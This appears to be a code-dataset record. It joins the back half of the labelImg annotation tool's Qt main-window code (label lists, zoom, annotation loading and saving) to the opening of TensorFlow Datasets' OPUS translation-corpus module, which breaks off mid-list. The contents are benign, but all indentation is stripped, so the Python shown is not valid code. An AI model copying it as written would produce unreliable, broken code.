difficult = self.diffcButton.isChecked()
try:
shape = self.itemsToShapes[item]
except:
pass
try:
if difficult != shape.difficult:
shape.difficult = difficult
self.setDirty()
else:
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
except:
pass
def shapeSelectionChanged(self, selected=False):
if self._noSelectionSlot:
self._noSelectionSlot = False
else:
shape = self.canvas.selectedShape
if shape:
self.shapesToItems[shape].setSelected(True)
else:
self.labelList.clearSelection()
self.actions.delete.setEnabled(selected)
self.actions.copy.setEnabled(selected)
self.actions.edit.setEnabled(selected)
self.actions.shapeLineColor.setEnabled(selected)
self.actions.shapeFillColor.setEnabled(selected)
def addLabel(self, shape):
shape.paintLabel = self.displayLabelOption.isChecked()
item = HashableQListWidgetItem(shape.label)
item.setFlags(item.flags() | Qt.ItemIsUserCheckable)
item.setCheckState(Qt.Checked)
item.setBackground(generateColorByText(shape.label))
self.itemsToShapes[item] = shape
self.shapesToItems[shape] = item
self.labelList.addItem(item)
for action in self.actions.onShapesPresent:
action.setEnabled(True)
self.updateComboBox()
def remLabel(self, shape):
if shape is None:
return
item = self.shapesToItems[shape]
self.labelList.takeItem(self.labelList.row(item))
del self.shapesToItems[shape]
del self.itemsToShapes[item]
self.updateComboBox()
def loadLabels(self, shapes):
s = []
for label, points, line_color, fill_color, difficult in shapes:
shape = Shape(label=label)
for x, y in points:
x, y, snapped = self.canvas.snapPointToCanvas(x, y)
if snapped:
self.setDirty()
shape.addPoint(QPointF(x, y))
shape.difficult = difficult
shape.close()
s.append(shape)
if line_color:
shape.line_color = QColor(*line_color)
else:
shape.line_color = generateColorByText(label)
if fill_color:
shape.fill_color = QColor(*fill_color)
else:
shape.fill_color = generateColorByText(label)
self.addLabel(shape)
self.updateComboBox()
self.canvas.loadShapes(s)
def updateComboBox(self):
itemsTextList = [str(self.labelList.item(i).text()) for i in range(self.labelList.count())]
uniqueTextList = list(set(itemsTextList))
uniqueTextList.append("")
uniqueTextList.sort()
self.comboBox.update_items(uniqueTextList)
def saveLabels(self, annotationFilePath):
annotationFilePath = ustr(annotationFilePath)
if self.labelFile is None:
self.labelFile = LabelFile()
self.labelFile.verified = self.canvas.verified
def format_shape(s):
return dict(label=s.label,
line_color=s.line_color.getRgb(),
fill_color=s.fill_color.getRgb(),
points=[(p.x(), p.y()) for p in s.points],
difficult = s.difficult)
shapes = [format_shape(shape) for shape in self.canvas.shapes]
try:
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
if annotationFilePath[-4:].lower() != ".xml":
annotationFilePath += XML_EXT
self.labelFile.savePascalVocFormat(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
elif self.labelFileFormat == LabelFileFormat.YOLO:
if annotationFilePath[-4:].lower() != ".txt":
annotationFilePath += TXT_EXT
self.labelFile.saveYoloFormat(annotationFilePath, shapes, self.filePath, self.imageData, self.labelHist,
self.lineColor.getRgb(), self.fillColor.getRgb())
elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
if annotationFilePath[-5:].lower() != ".json":
annotationFilePath += JSON_EXT
self.labelFile.saveCreateMLFormat(annotationFilePath, shapes, self.filePath, self.imageData,
self.labelHist, self.lineColor.getRgb(), self.fillColor.getRgb())
else:
self.labelFile.save(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
print('Image:{0} -> Annotation:{1}'.format(self.filePath, annotationFilePath))
return True
except LabelFileError as e:
self.errorMessage(u'Error saving label data', u'<b>%s</b>' % e)
return False
def copySelectedShape(self):
self.addLabel(self.canvas.copySelectedShape())
self.shapeSelectionChanged(True)
def comboSelectionChanged(self, index):
text = self.comboBox.cb.itemText(index)
for i in range(self.labelList.count()):
if text == "":
self.labelList.item(i).setCheckState(2)
elif text != self.labelList.item(i).text():
self.labelList.item(i).setCheckState(0)
else:
self.labelList.item(i).setCheckState(2)
def labelSelectionChanged(self):
item = self.currentItem()
if item and self.canvas.editing():
self._noSelectionSlot = True
self.canvas.selectShape(self.itemsToShapes[item])
shape = self.itemsToShapes[item]
self.diffcButton.setChecked(shape.difficult)
def labelItemChanged(self, item):
shape = self.itemsToShapes[item]
label = item.text()
if label != shape.label:
shape.label = item.text()
shape.line_color = generateColorByText(shape.label)
self.setDirty()
else:
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
def newShape(self):
if not self.useDefaultLabelCheckbox.isChecked() or not self.defaultLabelTextLine.text():
if len(self.labelHist) > 0:
self.labelDialog = LabelDialog(
parent=self, listItem=self.labelHist)
if self.singleClassMode.isChecked() and self.lastLabel:
text = self.lastLabel
else:
text = self.labelDialog.popUp(text=self.prevLabelText)
self.lastLabel = text
else:
text = self.defaultLabelTextLine.text()
self.diffcButton.setChecked(False)
if text is not None:
self.prevLabelText = text
generate_color = generateColorByText(text)
shape = self.canvas.setLastLabel(text, generate_color, generate_color)
self.addLabel(shape)
if self.beginner():
self.canvas.setEditing(True)
self.actions.create.setEnabled(True)
else:
self.actions.editMode.setEnabled(True)
self.setDirty()
if text not in self.labelHist:
self.labelHist.append(text)
else:
self.canvas.resetAllLines()
def scrollRequest(self, delta, orientation):
units = - delta / (8 * 15)
bar = self.scrollBars[orientation]
bar.setValue(bar.value() + bar.singleStep() * units)
def setZoom(self, value):
self.actions.fitWidth.setChecked(False)
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.MANUAL_ZOOM
self.zoomWidget.setValue(value)
def addZoom(self, increment=10):
self.setZoom(self.zoomWidget.value() + increment)
def zoomRequest(self, delta):
h_bar = self.scrollBars[Qt.Horizontal]
v_bar = self.scrollBars[Qt.Vertical]
h_bar_max = h_bar.maximum()
v_bar_max = v_bar.maximum()
cursor = QCursor()
pos = cursor.pos()
relative_pos = QWidget.mapFromGlobal(self, pos)
cursor_x = relative_pos.x()
cursor_y = relative_pos.y()
w = self.scrollArea.width()
h = self.scrollArea.height()
margin = 0.1
move_x = (cursor_x - margin * w) / (w - 2 * margin * w)
move_y = (cursor_y - margin * h) / (h - 2 * margin * h)
# clamp the values from 0 to 1
move_x = min(max(move_x, 0), 1)
move_y = min(max(move_y, 0), 1)
# zoom in
units = delta / (8 * 15)
scale = 10
self.addZoom(scale * units)
# get the difference in scrollbar values
# this is how far we can move
d_h_bar_max = h_bar.maximum() - h_bar_max
d_v_bar_max = v_bar.maximum() - v_bar_max
# get the new scrollbar values
new_h_bar_value = h_bar.value() + move_x * d_h_bar_max
new_v_bar_value = v_bar.value() + move_y * d_v_bar_max
h_bar.setValue(new_h_bar_value)
v_bar.setValue(new_v_bar_value)
def setFitWindow(self, value=True):
if value:
self.actions.fitWidth.setChecked(False)
self.zoomMode = self.FIT_WINDOW if value else self.MANUAL_ZOOM
self.adjustScale()
def setFitWidth(self, value=True):
if value:
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.FIT_WIDTH if value else self.MANUAL_ZOOM
self.adjustScale()
def togglePolygons(self, value):
for item, shape in self.itemsToShapes.items():
item.setCheckState(Qt.Checked if value else Qt.Unchecked)
def loadFile(self, filePath=None):
self.resetState()
self.canvas.setEnabled(False)
if filePath is None:
filePath = self.settings.get(SETTING_FILENAME)
# Make sure that filePath is a regular python string, rather than QString
filePath = ustr(filePath)
# Fix bug: An index error after select a directory when open a new file.
unicodeFilePath = ustr(filePath)
unicodeFilePath = os.path.abspath(unicodeFilePath)
# Tzutalin 20160906 : Add file list and dock to move faster
# Highlight the file item
if unicodeFilePath and self.fileListWidget.count() > 0:
if unicodeFilePath in self.mImgList:
index = self.mImgList.index(unicodeFilePath)
fileWidgetItem = self.fileListWidget.item(index)
fileWidgetItem.setSelected(True)
else:
self.fileListWidget.clear()
self.mImgList.clear()
if unicodeFilePath and os.path.exists(unicodeFilePath):
if LabelFile.isLabelFile(unicodeFilePath):
try:
self.labelFile = LabelFile(unicodeFilePath)
except LabelFileError as e:
self.errorMessage(u'Error opening file',
(u"<p><b>%s</b></p>"
u"<p>Make sure <i>%s</i> is a valid label file.")
% (e, unicodeFilePath))
self.status("Error reading %s" % unicodeFilePath)
return False
self.imageData = self.labelFile.imageData
self.lineColor = QColor(*self.labelFile.lineColor)
self.fillColor = QColor(*self.labelFile.fillColor)
self.canvas.verified = self.labelFile.verified
else:
# Load image:
# read data first and store for saving into label file.
self.imageData = read(unicodeFilePath, None)
self.labelFile = None
self.canvas.verified = False
if isinstance(self.imageData, QImage):
image = self.imageData
else:
image = QImage.fromData(self.imageData)
if image.isNull():
self.errorMessage(u'Error opening file',
u"<p>Make sure <i>%s</i> is a valid image file." % unicodeFilePath)
self.status("Error reading %s" % unicodeFilePath)
return False
self.status("Loaded %s" % os.path.basename(unicodeFilePath))
self.image = image
self.filePath = unicodeFilePath
self.canvas.loadPixmap(QPixmap.fromImage(image))
if self.labelFile:
self.loadLabels(self.labelFile.shapes)
self.setClean()
self.canvas.setEnabled(True)
self.adjustScale(initial=True)
self.paintCanvas()
self.addRecentFile(self.filePath)
self.toggleActions(True)
self.showBoundingBoxFromAnnotationFile(filePath)
self.setWindowTitle(__appname__ + ' ' + filePath)
# Default : select last item if there is at least one item
if self.labelList.count():
self.labelList.setCurrentItem(self.labelList.item(self.labelList.count()-1))
self.labelList.item(self.labelList.count()-1).setSelected(True)
self.canvas.setFocus(True)
return True
return False
def showBoundingBoxFromAnnotationFile(self, filePath):
if self.defaultSaveDir is not None:
basename = os.path.basename(
os.path.splitext(filePath)[0])
filedir = filePath.split(basename)[0].split(os.path.sep)[-2:-1][0]
xmlPath = os.path.join(self.defaultSaveDir, basename + XML_EXT)
txtPath = os.path.join(self.defaultSaveDir, basename + TXT_EXT)
jsonPath = os.path.join(self.defaultSaveDir, filedir + JSON_EXT)
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
elif os.path.isfile(jsonPath):
self.loadCreateMLJSONByFilename(jsonPath, filePath)
else:
xmlPath = os.path.splitext(filePath)[0] + XML_EXT
txtPath = os.path.splitext(filePath)[0] + TXT_EXT
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
def resizeEvent(self, event):
if self.canvas and not self.image.isNull()\
and self.zoomMode != self.MANUAL_ZOOM:
self.adjustScale()
super(MainWindow, self).resizeEvent(event)
def paintCanvas(self):
assert not self.image.isNull(), "cannot paint null image"
self.canvas.scale = 0.01 * self.zoomWidget.value()
self.canvas.adjustSize()
self.canvas.update()
def adjustScale(self, initial=False):
value = self.scalers[self.FIT_WINDOW if initial else self.zoomMode]()
self.zoomWidget.setValue(int(100 * value))
def scaleFitWindow(self):
e = 2.0 # So that no scrollbars are generated.
w1 = self.centralWidget().width() - e
h1 = self.centralWidget().height() - e
a1 = w1 / h1
# Calculate a new scale value based on the pixmap's aspect ratio.
w2 = self.canvas.pixmap.width() - 0.0
h2 = self.canvas.pixmap.height() - 0.0
a2 = w2 / h2
return w1 / w2 if a2 >= a1 else h1 / h2
def scaleFitWidth(self):
w = self.centralWidget().width() - 2.0
return w / self.canvas.pixmap.width()
def closeEvent(self, event):
if not self.mayContinue():
event.ignore()
settings = self.settings
if self.dirname is None:
settings[SETTING_FILENAME] = self.filePath if self.filePath else ''
else:
settings[SETTING_FILENAME] = ''
settings[SETTING_WIN_SIZE] = self.size()
settings[SETTING_WIN_POSE] = self.pos()
settings[SETTING_WIN_STATE] = self.saveState()
settings[SETTING_LINE_COLOR] = self.lineColor
settings[SETTING_FILL_COLOR] = self.fillColor
settings[SETTING_RECENT_FILES] = self.recentFiles
settings[SETTING_ADVANCE_MODE] = not self._beginner
if self.defaultSaveDir and os.path.exists(self.defaultSaveDir):
settings[SETTING_SAVE_DIR] = ustr(self.defaultSaveDir)
else:
settings[SETTING_SAVE_DIR] = ''
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
settings[SETTING_LAST_OPEN_DIR] = self.lastOpenDir
else:
settings[SETTING_LAST_OPEN_DIR] = ''
settings[SETTING_AUTO_SAVE] = self.autoSaving.isChecked()
settings[SETTING_SINGLE_CLASS] = self.singleClassMode.isChecked()
settings[SETTING_PAINT_LABEL] = self.displayLabelOption.isChecked()
settings[SETTING_DRAW_SQUARE] = self.drawSquaresOption.isChecked()
settings[SETTING_LABEL_FILE_FORMAT] = self.labelFileFormat
settings.save()
def loadRecent(self, filename):
if self.mayContinue():
self.loadFile(filename)
def scanAllImages(self, folderPath):
extensions = ['.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
images = []
for root, dirs, files in os.walk(folderPath):
for file in files:
if file.lower().endswith(tuple(extensions)):
relativePath = os.path.join(root, file)
path = ustr(os.path.abspath(relativePath))
images.append(path)
natural_sort(images, key=lambda x: x.lower())
return images
def changeSavedirDialog(self, _value=False):
if self.defaultSaveDir is not None:
path = ustr(self.defaultSaveDir)
else:
path = '.'
dirpath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Save annotations to the directory' % __appname__, path, QFileDialog.ShowDirsOnly
| QFileDialog.DontResolveSymlinks))
if dirpath is not None and len(dirpath) > 1:
self.defaultSaveDir = dirpath
self.statusBar().showMessage('%s . Annotation will be saved to %s' %
('Change saved folder', self.defaultSaveDir))
self.statusBar().show()
def openAnnotationDialog(self, _value=False):
if self.filePath is None:
self.statusBar().showMessage('Please select image first')
self.statusBar().show()
return
path = os.path.dirname(ustr(self.filePath))\
if self.filePath else '.'
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
filters = "Open Annotation XML file (%s)" % ' '.join(['*.xml'])
filename = ustr(QFileDialog.getOpenFileName(self,'%s - Choose a xml file' % __appname__, path, filters))
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadPascalXMLByFilename(filename)
def openDirDialog(self, _value=False, dirpath=None, silent=False):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
if silent!=True :
targetDirPath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
else:
targetDirPath = ustr(defaultOpenDirPath)
self.lastOpenDir = targetDirPath
self.importDirImages(targetDirPath)
def importDirImages(self, dirpath):
if not self.mayContinue() or not dirpath:
return
self.lastOpenDir = dirpath
self.dirname = dirpath
self.filePath = None
self.fileListWidget.clear()
self.mImgList = self.scanAllImages(dirpath)
self.openNextImg()
for imgPath in self.mImgList:
item = QListWidgetItem(imgPath)
self.fileListWidget.addItem(item)
def verifyImg(self, _value=False):
# Proceding next image without dialog if having any label
if self.filePath is not None:
try:
self.labelFile.toggleVerify()
except AttributeError:
# If the labelling file does not exist yet, create if and
# re-save it with the verified attribute.
self.saveFile()
if self.labelFile != None:
self.labelFile.toggleVerify()
else:
return
self.canvas.verified = self.labelFile.verified
self.paintCanvas()
self.saveFile()
def openPrevImg(self, _value=False):
# Proceding prev image without dialog if having any label
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
if self.filePath is None:
return
currIndex = self.mImgList.index(self.filePath)
if currIndex - 1 >= 0:
filename = self.mImgList[currIndex - 1]
if filename:
self.loadFile(filename)
def openNextImg(self, _value=False):
# Proceding prev image without dialog if having any label
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
filename = None
if self.filePath is None:
filename = self.mImgList[0]
else:
currIndex = self.mImgList.index(self.filePath)
if currIndex + 1 < len(self.mImgList):
filename = self.mImgList[currIndex + 1]
if filename:
self.loadFile(filename)
def openFile(self, _value=False):
if not self.mayContinue():
return
path = os.path.dirname(ustr(self.filePath)) if self.filePath else '.'
formats = ['*.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
filters = "Image & Label files (%s)" % ' '.join(formats + ['*%s' % LabelFile.suffix])
filename = QFileDialog.getOpenFileName(self, '%s - Choose Image or Label file' % __appname__, path, filters)
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadFile(filename)
def saveFile(self, _value=False):
if self.defaultSaveDir is not None and len(ustr(self.defaultSaveDir)):
if self.filePath:
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(ustr(self.defaultSaveDir), savedFileName)
self._saveFile(savedPath)
else:
imgFileDir = os.path.dirname(self.filePath)
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(imgFileDir, savedFileName)
self._saveFile(savedPath if self.labelFile
else self.saveFileDialog(removeExt=False))
def saveFileAs(self, _value=False):
assert not self.image.isNull(), "cannot save empty image"
self._saveFile(self.saveFileDialog())
def saveFileDialog(self, removeExt=True):
caption = '%s - Choose File' % __appname__
filters = 'File (*%s)' % LabelFile.suffix
openDialogPath = self.currentPath()
dlg = QFileDialog(self, caption, openDialogPath, filters)
dlg.setDefaultSuffix(LabelFile.suffix[1:])
dlg.setAcceptMode(QFileDialog.AcceptSave)
filenameWithoutExtension = os.path.splitext(self.filePath)[0]
dlg.selectFile(filenameWithoutExtension)
dlg.setOption(QFileDialog.DontUseNativeDialog, False)
if dlg.exec_():
fullFilePath = ustr(dlg.selectedFiles()[0])
if removeExt:
return os.path.splitext(fullFilePath)[0] # Return file path without the extension.
else:
return fullFilePath
return ''
def _saveFile(self, annotationFilePath):
if annotationFilePath and self.saveLabels(annotationFilePath):
self.setClean()
self.statusBar().showMessage('Saved to %s' % annotationFilePath)
self.statusBar().show()
def closeFile(self, _value=False):
if not self.mayContinue():
return
self.resetState()
self.setClean()
self.toggleActions(False)
self.canvas.setEnabled(False)
self.actions.saveAs.setEnabled(False)
def deleteImg(self):
deletePath = self.filePath
if deletePath is not None:
self.openNextImg()
if os.path.exists(deletePath):
os.remove(deletePath)
self.importDirImages(self.lastOpenDir)
def resetAll(self):
self.settings.reset()
self.close()
proc = QProcess()
proc.startDetached(os.path.abspath(__file__))
def mayContinue(self):
if not self.dirty:
return True
else:
discardChanges = self.discardChangesDialog()
if discardChanges == QMessageBox.No:
return True
elif discardChanges == QMessageBox.Yes:
self.saveFile()
return True
else:
return False
def discardChangesDialog(self):
yes, no, cancel = QMessageBox.Yes, QMessageBox.No, QMessageBox.Cancel
msg = u'You have unsaved changes, would you like to save them and proceed?\nClick "No" to undo all changes.'
return QMessageBox.warning(self, u'Attention', msg, yes | no | cancel)
def errorMessage(self, title, message):
return QMessageBox.critical(self, title,
'<p><b>%s</b></p>%s' % (title, message))
def currentPath(self):
return os.path.dirname(self.filePath) if self.filePath else '.'
def chooseColor1(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.lineColor = color
Shape.line_color = color
self.canvas.setDrawingColor(color)
self.canvas.update()
self.setDirty()
def deleteSelectedShape(self):
self.remLabel(self.canvas.deleteSelected())
self.setDirty()
if self.noShapes():
for action in self.actions.onShapesPresent:
action.setEnabled(False)
def chshapeLineColor(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.canvas.selectedShape.line_color = color
self.canvas.update()
self.setDirty()
def chshapeFillColor(self):
color = self.colorDialog.getColor(self.fillColor, u'Choose fill color',
default=DEFAULT_FILL_COLOR)
if color:
self.canvas.selectedShape.fill_color = color
self.canvas.update()
self.setDirty()
def copyShape(self):
self.canvas.endMove(copy=True)
self.addLabel(self.canvas.selectedShape)
self.setDirty()
def moveShape(self):
self.canvas.endMove(copy=False)
self.setDirty()
def loadPredefinedClasses(self, predefClassesFile):
if os.path.exists(predefClassesFile) is True:
with codecs.open(predefClassesFile, 'r', 'utf8') as f:
for line in f:
line = line.strip()
if self.labelHist is None:
self.labelHist = [line]
else:
self.labelHist.append(line)
def loadPascalXMLByFilename(self, xmlPath):
if self.filePath is None:
return
if os.path.isfile(xmlPath) is False:
return
self.set_format(FORMAT_PASCALVOC)
tVocParseReader = PascalVocReader(xmlPath)
shapes = tVocParseReader.getShapes()
self.loadLabels(shapes)
self.canvas.verified = tVocParseReader.verified
def loadYOLOTXTByFilename(self, txtPath):
if self.filePath is None:
return
if os.path.isfile(txtPath) is False:
return
self.set_format(FORMAT_YOLO)
tYoloParseReader = YoloReader(txtPath, self.image)
shapes = tYoloParseReader.getShapes()
print (shapes)
self.loadLabels(shapes)
self.canvas.verified = tYoloParseReader.verified
def loadCreateMLJSONByFilename(self, jsonPath, filePath):
if self.filePath is None:
return
if os.path.isfile(jsonPath) is False:
return
self.set_format(FORMAT_CREATEML)
crmlParseReader = CreateMLReader(jsonPath, filePath)
shapes = crmlParseReader.get_shapes()
self.loadLabels(shapes)
self.canvas.verified = crmlParseReader.verified
def copyPreviousBoundingBoxes(self):
currIndex = self.mImgList.index(self.filePath)
if currIndex - 1 >= 0:
prevFilePath = self.mImgList[currIndex - 1]
self.showBoundingBoxFromAnnotationFile(prevFilePath)
self.saveFile()
def togglePaintLabelsOption(self):
for shape in self.canvas.shapes:
shape.paintLabel = self.displayLabelOption.isChecked()
def toogleDrawSquare(self):
self.canvas.setDrawingShapeToSquare(self.drawSquaresOption.isChecked())
def inverted(color):
return QColor(*[255 - v for v in color.getRgb()])
def read(filename, default=None):
try:
reader = QImageReader(filename)
reader.setAutoTransform(True)
return reader.read()
except:
return default
def get_main_app(argv=[]):
app = QApplication(argv)
app.setApplicationName(__appname__)
app.setWindowIcon(newIcon("app"))
# Tzutalin 201705+: Accept extra agruments to change predefined class file
argparser = argparse.ArgumentParser()
argparser.add_argument("image_dir", nargs="?")
argparser.add_argument("predefined_classes_file",
default=os.path.join(os.path.dirname(__file__), "data", "predefined_classes.txt"),
nargs="?")
argparser.add_argument("save_dir", nargs="?")
args = argparser.parse_args(argv[1:])
# Usage : labelImg.py image predefClassFile saveDir
win = MainWindow(args.image_dir,
args.predefined_classes_file,
args.save_dir)
win.show()
return app, win
def main():
app, _win = get_main_app(sys.argv)
return app.exec_()
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c2cc1ba216c583d4886860a8ada7e287c0932c6 | 13,343 | py | Python | tensorflow_datasets/translate/opus.py | ChAnYaNG97/datasets | 0a45e2ea98716d325fc1c5e5494f2575f3bdb908 | [
"Apache-2.0"
] | 1 | 2020-10-11T19:15:49.000Z | 2020-10-11T19:15:49.000Z | tensorflow_datasets/translate/opus.py | ChAnYaNG97/datasets | 0a45e2ea98716d325fc1c5e5494f2575f3bdb908 | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/translate/opus.py | ChAnYaNG97/datasets | 0a45e2ea98716d325fc1c5e5494f2575f3bdb908 | [
"Apache-2.0"
] | 1 | 2020-08-03T20:19:12.000Z | 2020-08-03T20:19:12.000Z | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""opus dataset."""
import os
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_CITATION = """
@inproceedings{Tiedemann2012ParallelData,
author = {Tiedemann, J},
title = {Parallel Data, Tools and Interfaces in OPUS},
booktitle = {LREC}
year = {2012}}
"""
_DESCRIPTION = """
OPUS is a collection of translated texts from the web.
Create your own config to choose which data / language pair to load.
```
config = tfds.translate.opus.OpusConfig(
version=tfds.core.Version('0.1.0'),
language_pair=("de", "en"),
subsets=["GNOME", "EMEA"]
)
builder = tfds.builder("opus", config=config)
```
"""
class SubDataset():
"""Class to keep track of information on a sub-dataset of OPUS."""
def __init__(self, name, description, homepage, url, languages):
"""Sub-dataset of OPUS.
Args:
name: `string`, a unique dataset identifier.
description: `string`, a description of the dataset.
homepage: `string`, homepage of the dataset.
url: `string`, download url for the dataset.
languages: `<list>(string)`, a list of supported languages.
"""
self.name = name
self.description = description
self.homepage = homepage
self.url = url
sorted_languages = sorted(languages)
language_pairs = []
for idx, source in enumerate(sorted_languages):
for target in sorted_languages[idx + 1:]:
language_pairs.append((source, target))
self.language_pairs = language_pairs
DATASET_MAP = {ds.name: ds for ds in [ # pylint:disable=g-complex-comprehension
# pylint:disable=line-too-long
SubDataset(
name="EMEA",
description="A parallel corpus made out of PDF documents from the European Medicines Agency.",
homepage="http://opus.nlpl.eu/EMEA.php",
url="http://opus.nlpl.eu/download.php?f=EMEA/v3/moses/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="JRC-Acquis",
description="A collection of legislative text of the European Union and currently comprises selected texts written between the 1950s and now.",
homepage="http://opus.nlpl.eu/JRC-Acquis.php",
url="http://opus.nlpl.eu/download.php?f=JRC-Acquis/",
languages=["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"]
),
SubDataset(
name="Tanzil",
description="A collection of Quran translations compiled by the Tanzil project.",
homepage="http://opus.nlpl.eu/Tanzil.php",
url="http://opus.nlpl.eu/download.php?f=Tanzil/v1/moses/",
languages=["am", "ar", "az", "bg", "bn", "bs", "cs", "de", "dv", "en", "es", "fa", "fr", "ha", "hi", "id", "it", "ja", "ko", "ku", "ml", "ms", "nl", "no", "pl", "pt", "ro", "ru", "sd", "so", "sq", "sv", "sw", "ta", "tg", "th", "tr", "tt", "ug", "ur", "uz", "zh"]
),
SubDataset(
name="GNOME",
description="A parallel corpus of GNOME localization files. Source: https://l10n.gnome.org",
homepage="http://opus.nlpl.eu/GNOME.php",
url="http://opus.nlpl.eu/download.php?f=GNOME/v1/moses/",
languages=["af", "am", "an", "ang", "ar", "ar_TN", "ara", "as", "ast", "az", "az_IR", "bal", "be", "bem", "bg", "bg_BG", "bn", "bn_IN", "bo", "br", "brx", "bs", "ca", "cat", "crh", "cs", "csb", "cy", "da", "da_DK", "de", "de_CH", "dv", "dz", "el", "en", "en_AU", "en_CA", "en_GB", "en_NZ", "en_US", "en_ZA", "eo", "es", "es_AR", "es_CL", "es_CO", "es_CR", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN", "es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_SV", "es_UY", "es_VE", "et", "eu", "fa", "fa_IR", "fi", "fo", "foo", "fr", "fur", "fy", "ga", "gd", "gl", "gn", "gr", "gu", "gv", "ha", "he", "hi", "hi_IN", "hr", "hu", "hy", "ia", "id", "ig", "io", "is", "it", "it_IT", "ja", "jbo", "ka", "kg", "kk", "km", "kn", "ko", "kr", "ks", "ku", "ky", "la", "lg", "li", "lo", "lt", "lv", "mai", "mg", "mi", "mk", "ml", "mn", "mr", "ms", "ms_MY", "mt", "mus", "my", "nb", "nb_NO", "nds", "ne", "nhn", "nl", "nn", "nn_NO", "no", "no_nb", "nqo", "nr", "nso", "oc", "or", "os", "pa", "pl", "ps", "pt", "pt_BR", "pt_PT", "quz", "ro", "ru", "rw", "si", "sk", "sl", "so", "sq", "sr", "sr_ME", "st", "sv", "sw", "szl", "ta", "te", "tg", "tg_TJ", "th", "tk", "tl", "tl_PH", "tmp", "tr", "tr_TR", "ts", "tt", "ug", "uk", "ur", "ur_PK", "uz", "vi", "vi_VN", "wa", "xh", "yi", "yo", "zh_CN", "zh_HK", "zh_TW", "zu"]
),
SubDataset(
name="KDE4",
description="A parallel corpus of KDE4 localization files (v.2).",
homepage="http://opus.nlpl.eu/KDE4.php",
url="http://opus.nlpl.eu/download.php?f=KDE4/v2/moses/",
languages=["af", "ar", "as", "ast", "be", "bg", "bn", "bn_IN", "br", "ca", "crh", "cs", "csb", "cy", "da", "de", "el", "en", "en_GB", "eo", "es", "et", "eu", "fa", "fi", "fr", "fy", "ga", "gl", "gu", "ha", "he", "hi", "hne", "hr", "hsb", "hu", "hy", "id", "is", "it", "ja", "ka", "kk", "km", "kn", "ko", "ku", "lb", "lt", "lv", "mai", "mk", "ml", "mr", "ms", "mt", "nb", "nds", "ne", "nl", "nn", "nso", "oc", "or", "pa", "pl", "ps", "pt", "pt_BR", "ro", "ru", "rw", "se", "si", "sk", "sl", "sr", "sv", "ta", "te", "tg", "th", "tr", "uk", "uz", "vi", "wa", "xh", "zh_CN", "zh_HK", "zh_TW"]
),
SubDataset(
name="PHP",
description="A parallel corpus originally extracted from http://se.php.net/download-docs.php.",
homepage="http://opus.nlpl.eu/PHP.php",
url="http://opus.nlpl.eu/download.php?f=PHP/v1/moses/",
languages=["cs", "de", "en", "es", "fi", "fr", "he", "hu", "it", "ja", "ko", "nl", "pl", "pt_BR", "ro", "ru", "sk", "sl", "sv", "tr", "tw", "zh", "zh_TW"]
),
SubDataset(
name="Ubuntu",
description="A parallel corpus of Ubuntu localization files. Source: https://translations.launchpad.net",
homepage="http://opus.nlpl.eu/Ubuntu.php",
url="http://opus.nlpl.eu/download.php?f=Ubuntu/v14.10/moses/",
